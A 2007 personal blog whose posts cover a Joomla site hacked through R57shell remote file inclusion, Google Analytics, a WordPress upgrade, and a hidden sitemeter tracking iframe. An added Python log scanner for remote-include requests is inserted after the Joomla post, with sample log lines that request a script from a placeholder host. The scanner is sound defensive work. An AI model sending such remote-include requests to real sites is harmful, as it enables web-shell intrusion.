September 4, 2007 3:09 pm
One of my Joomla sites (Design and Hosting) got hacked again! Usually I just fix the configuration file, knowing that it will do the job, but also knowing that the vulnerabilities are still there. So this time I’ve decided to track down the problem, and found out from the log that it was hacked by someone in Turkey using something called R57shell! How it works on the other side seems quite simple; in this case the URL used was
I won’t show the last part, but it’s a URL to a site containing the r57shell script. And that’s it, they can view and change all the files and directories! Anyway, in my case the problem was caused by a SEF component used to rewrite the URLs. Have no time to fix it now, only took out the hacked files. Will do a clean install this time since the current one is quite ‘broken’; until then, the site will be down. If you also use Joomla, here are some guides which I found useful…
A lot of them are common sense, like keeping the software up to date… can’t be lazy sometimes, will just end up spending more time fixing it after the damage has been done!
— Update 17:10 —
Site back online! Using a different component for url rewrite this time, hopefully it won’t be hacked again soon…
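A log check for the pattern described in this post, a request whose query parameter value is itself a URL to another site. This is an added example, not code from the original post; it assumes Apache combined log format, and the sample lines, addresses and parameter names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A decoded parameter value that starts with a remote URL scheme.
REMOTE_VALUE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_remote_includes(lines):
    """Return (ip, time, status, path, param, value) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not parseable request entries
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes each value once, as the web server would.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_VALUE.match(value):
                hits.append((m.group("ip"), m.group("time"),
                             m.group("status"), parts.path, name, value))
    return hits


def scripts_by_client(hits):
    """Group the targeted script paths by client IP to show what needs patching."""
    grouped = {}
    for ip, _time, _status, path, _name, _value in hits:
        grouped.setdefault(ip, set()).add(path)
    return grouped


# Constructed sample lines (documentation addresses, hypothetical component and parameter).
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Sep/2007:09:12:44 +0000] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Sep/2007:09:13:02 +0000] "GET /components/com_example/file.php?path=http://files.example.org/s.txt HTTP/1.1" 200 8841 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Sep/2007:09:13:40 +0000] "GET /components/com_example/file.php?path=http%3A%2F%2Ffiles.example.org%2Fs.txt HTTP/1.1" 200 8841 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Sep/2007:09:14:10 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = find_remote_includes(SAMPLE_LOG)
    for hit in found:
        print(*hit, sep="  ")
    print(scripts_by_client(found))
```

The script paths it reports are the files to review or remove; a 200 status on a flagged request means the server answered it and the site should be treated as modified.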
Google keeps improving, they just released a new version of Google Analytics yesterday. The main difference for me is the interface; when I compared sitemeter and Google Analytics last time, I mentioned that sitemeter has a simpler interface. With this new version, I feel that they have managed to put in as much information as possible in a user-friendly way. It does take some time to get used to and there are new features which I haven’t tried as well, e.g. the customisable dashboard. Remember, Google Analytics is free, Google is quite amazing. Here are some screenshots which I took:
Overview – Summary page
Thanks to Jac, we now have a new QuGee Logo:
And also some changes to our QuGee frontpage, also new web buttons and badges:
If you want to put it on your site, this is the code:
<a href="http://www.qugee.com/"><img title="QuGee button" src="http://www.qugee.com/images/qugee_button.gif" alt="QuGee button" height="15" width="80" /></a>
Of course this is only one of the many ways to add the button. Lastly there are some very nice wallpapers which you can find on this page.
WordPress 2.1 has been released for quite a while now, but knowing that there could be many problems with plugins and not wanting the website to be down for a long time, I had decided to leave it until later. Finally got some time this weekend, so I decided it’s time to upgrade. Did the usual backups and searched for new versions of all the plugins. Disabled them all during the upgrade, overwrote the current WordPress with the new one, ran the upgrade script and everything was working except one or two plugins. Even WPG2, the wordpress-gallery2 plugin which I was worried about not working, works without any further configuration.
Since I started upgrading the site, I tried out a few new plugins including the one on the stats page to show who’s online and another anti-spam image plugin. One feature which I really like about WordPress 2.1 is that in the edit page, it has two tabs for switching between Visual and Code rather than before where it pops up a window for editing the HTML code. I really appreciate and am quite impressed with open source software!
Today, sitemeter is down again and I went to check the code on my site using a Firefox plugin and found that, as well as the code that I expect to see, there is something extra:
<iframe width="0" height="0" frameborder="0" xsrc="http://dg.specificclick.net/?u=http%3A//vinlai.com/blog/&r=" style="display: none;">
Wondering why sitemeter is sending info to dg.specificclick.net? Me too! Did a search on Google and found this post on “SiteMeter and Spyware (Sort of)“, where it was found that this piece of code will return a set of tracking cookies. So I cleared my cookies and reloaded this page again, didn’t find any suspicious cookies yet, only cookies from sitemeter themselves, so will check at a later time or on another computer to confirm.
The sitemeter site has been down for 2 days for me so I started searching to see if other people are experiencing a similar problem. Other than finding out that some others are experiencing the same problem, I accidentally found a post on “Did Sitemeter sell out to Spyware?“. I did a few more searches to see if sitemeter is really sold out to Spyware, but that’s up to you to decide, I would still consider it as unconfirmed. However due to the server being down for me for 2 days, I’m really considering taking it out for this site and just using Google Analytics instead. If you are also using sitemeter, find out more for yourself from the link above.